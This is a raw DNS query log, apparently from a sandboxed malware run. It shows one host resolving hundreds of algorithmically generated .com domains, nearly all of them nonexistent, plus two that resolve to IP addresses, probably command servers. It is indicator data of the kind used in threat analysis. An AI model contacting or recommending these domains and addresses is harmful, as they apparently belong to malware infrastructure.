Nov 11, 2024 18:13:15.015290022 CET	1.1.1.1	192.168.2.6	0xb865	Name error (3)	galyvas.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.023699999 CET	1.1.1.1	192.168.2.6	0x9c36	Name error (3)	lykyvod.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.024396896 CET	1.1.1.1	192.168.2.6	0xbffb	Name error (3)	lymyjon.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.025855064 CET	1.1.1.1	192.168.2.6	0x1052	Name error (3)	pujycov.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.027493000 CET	1.1.1.1	192.168.2.6	0xc89f	Name error (3)	vonyjim.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.027503967 CET	1.1.1.1	192.168.2.6	0x81ef	Name error (3)	lysytyr.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.036501884 CET	1.1.1.1	192.168.2.6	0xb19c	Name error (3)	vofypuk.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.046622992 CET	1.1.1.1	192.168.2.6	0x4078	Name error (3)	pumymuv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.047010899 CET	1.1.1.1	192.168.2.6	0xe980	Name error (3)	gadypuw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.051929951 CET	1.1.1.1	192.168.2.6	0x4553	Name error (3)	lyvyguj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.069538116 CET	1.1.1.1	192.168.2.6	0x3e22	Name error (3)	lyxyfar.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.096026897 CET	1.1.1.1	192.168.2.6	0x8dbc	Name error (3)	qebynyg.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.100287914 CET	1.1.1.1	192.168.2.6	0x9849	Name error (3)	gahycib.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.100760937 CET	1.1.1.1	192.168.2.6	0x30f5	Name error (3)	ganynyb.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.100775003 CET	1.1.1.1	192.168.2.6	0xfe34	Name error (3)	qetyrap.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.102025032 CET	1.1.1.1	192.168.2.6	0xc1b6	Name error (3)	gacyfew.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.102088928 CET	1.1.1.1	192.168.2.6	0x51e	Name error (3)	gadyzyh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.103219986 CET	1.1.1.1	192.168.2.6	0x93c9	Name error (3)	gacyvah.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.103799105 CET	1.1.1.1	192.168.2.6	0xb658	Name error (3)	gaqyqis.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.104433060 CET	1.1.1.1	192.168.2.6	0xa652	Name error (3)	puryjil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.110183001 CET	1.1.1.1	192.168.2.6	0xfcf4	Name error (3)	qeqykog.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.117600918 CET	1.1.1.1	192.168.2.6	0x14bb	Name error (3)	lykysix.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.119544983 CET	1.1.1.1	192.168.2.6	0xec62	Name error (3)	vopykak.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.120610952 CET	1.1.1.1	192.168.2.6	0x40	Name error (3)	qegytyv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.123120070 CET	1.1.1.1	192.168.2.6	0x5b11	Name error (3)	lysylej.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.124356985 CET	1.1.1.1	192.168.2.6	0x3466	Name error (3)	purywop.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.124366999 CET	1.1.1.1	192.168.2.6	0x6524	Name error (3)	lymymud.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.125483036 CET	1.1.1.1	192.168.2.6	0xc8e8	Name error (3)	qegyxug.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.128022909 CET	1.1.1.1	192.168.2.6	0x5ae9	Name error (3)	puvygyq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.184725046 CET	1.1.1.1	192.168.2.6	0x6e9e	Name error (3)	lyvynen.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.191541910 CET	1.1.1.1	192.168.2.6	0x6e7a	Name error (3)	gatykow.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.203906059 CET	1.1.1.1	192.168.2.6	0x20cc	Name error (3)	vojycif.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.205862045 CET	1.1.1.1	192.168.2.6	0xa312	Name error (3)	pupylaq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.219168901 CET	1.1.1.1	192.168.2.6	0x56d3	Name error (3)	vofyzym.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.225939989 CET	1.1.1.1	192.168.2.6	0xd752	Name error (3)	gatyrez.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.230304956 CET	1.1.1.1	192.168.2.6	0x7bc3	Name error (3)	qekysip.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.230437040 CET	1.1.1.1	192.168.2.6	0xe9e5	Name error (3)	volydot.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.230608940 CET	1.1.1.1	192.168.2.6	0x48f9	Name error (3)	lygyxun.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.230881929 CET	1.1.1.1	192.168.2.6	0xf2a8	Name error (3)	qetykol.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.231163025 CET	1.1.1.1	192.168.2.6	0xf428	Name error (3)	pujypup.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.231175900 CET	1.1.1.1	192.168.2.6	0xcd5	Name error (3)	pufyxug.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.231302977 CET	1.1.1.1	192.168.2.6	0xa609	Name error (3)	puzydal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.232372999 CET	1.1.1.1	192.168.2.6	0xa877	Name error (3)	vojypuc.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.232402086 CET	1.1.1.1	192.168.2.6	0x91fa	Name error (3)	puzybep.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.232896090 CET	1.1.1.1	192.168.2.6	0x5d6f	Name error (3)	gahypus.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.234870911 CET	1.1.1.1	192.168.2.6	0x3bb8	Name error (3)	vocybam.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.236942053 CET	1.1.1.1	192.168.2.6	0xee4f	Name error (3)	volybec.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.238033056 CET	1.1.1.1	192.168.2.6	0x1950	Name error (3)	qexyfel.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.239419937 CET	1.1.1.1	192.168.2.6	0xfe26	Name error (3)	vocygyk.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.247252941 CET	1.1.1.1	192.168.2.6	0xfd3a	Name error (3)	galydoz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.247301102 CET	1.1.1.1	192.168.2.6	0x58de	Name error (3)	qedyleq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.251007080 CET	1.1.1.1	192.168.2.6	0x3755	Name error (3)	vowyqoc.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.251020908 CET	1.1.1.1	192.168.2.6	0xa263	Name error (3)	qedytul.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.251303911 CET	1.1.1.1	192.168.2.6	0xf634	Name error (3)	qeqyqiv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.252234936 CET	1.1.1.1	192.168.2.6	0x6c6d	Name error (3)	lyrywax.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.253130913 CET	1.1.1.1	192.168.2.6	0x509e	Name error (3)	puvybeg.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.253142118 CET	1.1.1.1	192.168.2.6	0xf935	Name error (3)	lyryjir.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.257508993 CET	1.1.1.1	192.168.2.6	0x1b3d	Name error (3)	pumyjig.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.738058090 CET	1.1.1.1	192.168.2.6	0x1e03	Name error (3)	qexyvoq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.739895105 CET	1.1.1.1	192.168.2.6	0x8fdb	Name error (3)	vowyjut.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.739907980 CET	1.1.1.1	192.168.2.6	0x3c9	Name error (3)	pufytev.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.754136086 CET	1.1.1.1	192.168.2.6	0x296e	Name error (3)	vofyref.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.758708954 CET	1.1.1.1	192.168.2.6	0x6e93	Name error (3)	lygytyd.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.761418104 CET	1.1.1.1	192.168.2.6	0x7e47	Name error (3)	lyxyvoj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.763180971 CET	1.1.1.1	192.168.2.6	0x4f77	Name error (3)	galypyh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.767030001 CET	1.1.1.1	192.168.2.6	0xda9d	Name error (3)	gadyrab.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.767869949 CET	1.1.1.1	192.168.2.6	0xd7c4	Name error (3)	puzyciq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.772901058 CET	1.1.1.1	192.168.2.6	0xb04e	Name error (3)	gaqynyw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.774689913 CET	1.1.1.1	192.168.2.6	0x13df	Name error (3)	vocydof.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.776909113 CET	1.1.1.1	192.168.2.6	0xc0f0	Name error (3)	qeqyhup.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.784113884 CET	1.1.1.1	192.168.2.6	0x96cd	Name error (3)	ganyfes.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.795253038 CET	1.1.1.1	192.168.2.6	0xd2c1	Name error (3)	qegylep.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.799618006 CET	1.1.1.1	192.168.2.6	0x4dae	Name error (3)	qekyxul.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.804044008 CET	1.1.1.1	192.168.2.6	0x6cc5	Name error (3)	lyvyvix.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.805147886 CET	1.1.1.1	192.168.2.6	0xd857	Name error (3)	vonygec.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.807177067 CET	1.1.1.1	192.168.2.6	0x2c1e	Name error (3)	gatyqih.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.807208061 CET	1.1.1.1	192.168.2.6	0x5ee1	Name error (3)	qedykiv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.811649084 CET	1.1.1.1	192.168.2.6	0x3548	Name error (3)	pujyteq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.811661959 CET	1.1.1.1	192.168.2.6	0x7434	Name error (3)	vopyjuf.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.814521074 CET	1.1.1.1	192.168.2.6	0xc5c3	Name error (3)	vopyqim.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.817318916 CET	1.1.1.1	192.168.2.6	0xddf0	Name error (3)	vojyrak.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.820235968 CET	1.1.1.1	192.168.2.6	0x6dd0	Name error (3)	lysyjid.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.821144104 CET	1.1.1.1	192.168.2.6	0xd29c	Name error (3)	qebyvop.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.835822105 CET	1.1.1.1	192.168.2.6	0xda0c	Name error (3)	gahyzez.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.843534946 CET	1.1.1.1	192.168.2.6	0x1c32	No error (0)	qetyhyg.com		64.225.91.73	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.852749109 CET	1.1.1.1	192.168.2.6	0x1c05	Name error (3)	pupyjuv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.857155085 CET	1.1.1.1	192.168.2.6	0xebd4	Name error (3)	ganyvoz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.858198881 CET	1.1.1.1	192.168.2.6	0xa3b6	Name error (3)	galycuw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.859885931 CET	1.1.1.1	192.168.2.6	0x4eb0	Name error (3)	puvycip.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.860203981 CET	1.1.1.1	192.168.2.6	0x48e0	Name error (3)	gaqyhuz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.860845089 CET	1.1.1.1	192.168.2.6	0x5203	Name error (3)	volycik.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.860857010 CET	1.1.1.1	192.168.2.6	0x706	Name error (3)	pupywog.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.861300945 CET	1.1.1.1	192.168.2.6	0x6419	Name error (3)	lymygyx.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.861938953 CET	1.1.1.1	192.168.2.6	0x3851	Name error (3)	lygylax.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.862792015 CET	1.1.1.1	192.168.2.6	0xd21	Name error (3)	qeqynel.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.862827063 CET	1.1.1.1	192.168.2.6	0xff42	Name error (3)	qedyrag.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.862936974 CET	1.1.1.1	192.168.2.6	0xd72f	Name error (3)	puzypug.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.863599062 CET	1.1.1.1	192.168.2.6	0xac07	Name error (3)	lyxysun.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.863831043 CET	1.1.1.1	192.168.2.6	0x991e	Name error (3)	pumybal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.863858938 CET	1.1.1.1	192.168.2.6	0xd49f	Name error (3)	qexysig.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.864216089 CET	1.1.1.1	192.168.2.6	0x5b85	Name error (3)	lysywon.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.865165949 CET	1.1.1.1	192.168.2.6	0x6af1	Name error (3)	pufylap.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.868628979 CET	1.1.1.1	192.168.2.6	0x69ec	Name error (3)	lykytej.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.869524002 CET	1.1.1.1	192.168.2.6	0xb3ef	Name error (3)	pumygyp.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.878582001 CET	1.1.1.1	192.168.2.6	0xa334	Name error (3)	puvydov.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.879256010 CET	1.1.1.1	192.168.2.6	0xd9c9	Name error (3)	lykyxur.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.880297899 CET	1.1.1.1	192.168.2.6	0xeb6c	Name error (3)	qekytyq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.881042957 CET	1.1.1.1	192.168.2.6	0x9d1e	Name error (3)	vonybat.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.881087065 CET	1.1.1.1	192.168.2.6	0xac8f	Name error (3)	qetyquq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.881097078 CET	1.1.1.1	192.168.2.6	0x6fc8	Name error (3)	volypum.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.881716967 CET	1.1.1.1	192.168.2.6	0x1d9	Name error (3)	vowymyk.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.882215023 CET	1.1.1.1	192.168.2.6	0x9622	Name error (3)	lyvyfad.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.884062052 CET	1.1.1.1	192.168.2.6	0x262c	Name error (3)	vojyzyt.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.885097027 CET	1.1.1.1	192.168.2.6	0xe279	Name error (3)	gadykos.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.885150909 CET	1.1.1.1	192.168.2.6	0x2d02	Name error (3)	purymuq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.886136055 CET	1.1.1.1	192.168.2.6	0x981e	Name error (3)	pujyxyl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.886374950 CET	1.1.1.1	192.168.2.6	0x7fc1	Name error (3)	lyrymuj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.901904106 CET	1.1.1.1	192.168.2.6	0xf07	Name error (3)	gacydib.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.904253006 CET	1.1.1.1	192.168.2.6	0x63a6	Name error (3)	lymyner.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.906605959 CET	1.1.1.1	192.168.2.6	0x6652	Name error (3)	qebyfav.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:16.046487093 CET	1.1.1.1	192.168.2.6	0x9258	No error (0)	gatyhub.com	pltraffic7.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 11, 2024 18:13:16.046487093 CET	1.1.1.1	192.168.2.6	0x9258	No error (0)	pltraffic7.com		72.52.179.174	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.304898977 CET	1.1.1.1	192.168.2.6	0x3726	Name error (3)	pumycug.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.313719988 CET	1.1.1.1	192.168.2.6	0x92c7	Name error (3)	galyros.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.326312065 CET	1.1.1.1	192.168.2.6	0xde18	Name error (3)	qedyhyl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.357827902 CET	1.1.1.1	192.168.2.6	0xb2b8	Name error (3)	lysyger.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.536225080 CET	1.1.1.1	192.168.2.6	0xe061	Name error (3)	vonycum.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.589833021 CET	1.1.1.1	192.168.2.6	0x5a15	Name error (3)	vopygat.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.595900059 CET	1.1.1.1	192.168.2.6	0x6f6c	Name error (3)	gaqyvob.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.613306999 CET	1.1.1.1	192.168.2.6	0x1ef9	Name error (3)	qebyxyq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.617840052 CET	1.1.1.1	192.168.2.6	0x62e6	Name error (3)	qegykiq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.632091045 CET	1.1.1.1	192.168.2.6	0x8737	Name error (3)	lygywor.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.633093119 CET	1.1.1.1	192.168.2.6	0xad13	Name error (3)	qexyxuv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.633774042 CET	1.1.1.1	192.168.2.6	0x7a3c	Name error (3)	gacycus.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.667737007 CET	1.1.1.1	192.168.2.6	0xfcc2	Name error (3)	gahykih.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.668210030 CET	1.1.1.1	192.168.2.6	0x1dd3	Name error (3)	vocypyt.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.668576002 CET	1.1.1.1	192.168.2.6	0xe18a	Name error (3)	purybav.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.668586969 CET	1.1.1.1	192.168.2.6	0x687b	Name error (3)	gaqyfah.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.669073105 CET	1.1.1.1	192.168.2.6	0xbea8	Name error (3)	vowybof.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.670007944 CET	1.1.1.1	192.168.2.6	0xc899	Name error (3)	gahyraw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.670541048 CET	1.1.1.1	192.168.2.6	0x3b4a	Name error (3)	vofyqit.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.670588970 CET	1.1.1.1	192.168.2.6	0xb619	Name error (3)	volyzef.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.670599937 CET	1.1.1.1	192.168.2.6	0xf7ce	Name error (3)	pumydoq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.670610905 CET	1.1.1.1	192.168.2.6	0xe615	Name error (3)	lyxyxyd.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.671068907 CET	1.1.1.1	192.168.2.6	0xe54b	Name error (3)	qegyrol.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.671586990 CET	1.1.1.1	192.168.2.6	0x563d	Name error (3)	galyzeb.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.671633005 CET	1.1.1.1	192.168.2.6	0xb17f	Name error (3)	vocycuc.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.671653986 CET	1.1.1.1	192.168.2.6	0xd9f1	Name error (3)	qeqyvig.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.673284054 CET	1.1.1.1	192.168.2.6	0xdabb	Name error (3)	gadyhyw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.688340902 CET	1.1.1.1	192.168.2.6	0xdb7d	Name error (3)	purygeg.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.688385963 CET	1.1.1.1	192.168.2.6	0x6ea4	Name error (3)	gacypyz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.689867020 CET	1.1.1.1	192.168.2.6	0xc49d	Name error (3)	vofyjuk.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.690413952 CET	1.1.1.1	192.168.2.6	0xe55	Name error (3)	lygyjuj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.690424919 CET	1.1.1.1	192.168.2.6	0x69d5	Name error (3)	lymyvin.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.692840099 CET	1.1.1.1	192.168.2.6	0xe4e4	Name error (3)	lyxytex.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.700054884 CET	1.1.1.1	192.168.2.6	0xf452	Name error (3)	qebysul.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.700541973 CET	1.1.1.1	192.168.2.6	0xe015	Name error (3)	lymyfoj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.718276978 CET	1.1.1.1	192.168.2.6	0x56aa	Name error (3)	puzytap.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.719909906 CET	1.1.1.1	192.168.2.6	0x28b1	Name error (3)	vojykom.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.720052958 CET	1.1.1.1	192.168.2.6	0xe020	Name error (3)	qexytep.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.720063925 CET	1.1.1.1	192.168.2.6	0xa811	Name error (3)	pufyjuq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.720072985 CET	1.1.1.1	192.168.2.6	0x8d23	Name error (3)	pupygel.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.721996069 CET	1.1.1.1	192.168.2.6	0x5f6d	Name error (3)	lykylan.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.723259926 CET	1.1.1.1	192.168.2.6	0xeb53	Name error (3)	lykywid.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.726749897 CET	1.1.1.1	192.168.2.6	0x91a6	Name error (3)	puzyxyv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.729340076 CET	1.1.1.1	192.168.2.6	0x374f	Name error (3)	vonydik.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.730627060 CET	1.1.1.1	192.168.2.6	0x9f48	Name error (3)	gadyquz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.732729912 CET	1.1.1.1	192.168.2.6	0xe078	Name error (3)	vowygem.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.735523939 CET	1.1.1.1	192.168.2.6	0x5462	Name error (3)	pufywil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.735542059 CET	1.1.1.1	192.168.2.6	0x4727	Name error (3)	qeqyfaq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.737205029 CET	1.1.1.1	192.168.2.6	0xe5ac	Name error (3)	lysymux.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.743390083 CET	1.1.1.1	192.168.2.6	0x3dff	Name error (3)	vopymyc.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.743988991 CET	1.1.1.1	192.168.2.6	0x540d	Name error (3)	qekylag.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.745608091 CET	1.1.1.1	192.168.2.6	0x5ee2	Name error (3)	ganydiw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.751766920 CET	1.1.1.1	192.168.2.6	0x606d	Name error (3)	ganycuh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.752331018 CET	1.1.1.1	192.168.2.6	0xa52f	Name error (3)	pupymyp.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.752370119 CET	1.1.1.1	192.168.2.6	0x2dd2	Name error (3)	qetynev.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.754327059 CET	1.1.1.1	192.168.2.6	0x6846	Name error (3)	pujylog.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.755822897 CET	1.1.1.1	192.168.2.6	0xde07	Name error (3)	lyrygyn.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.755834103 CET	1.1.1.1	192.168.2.6	0xeb20	Name error (3)	gatynes.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.756709099 CET	1.1.1.1	192.168.2.6	0x3b4	Name error (3)	lyvysur.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.757064104 CET	1.1.1.1	192.168.2.6	0x40f2	Name error (3)	qedyqup.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.757076979 CET	1.1.1.1	192.168.2.6	0x8436	Name error (3)	volyrac.com	none	none	A (IP address)	IN (0x0001)	false
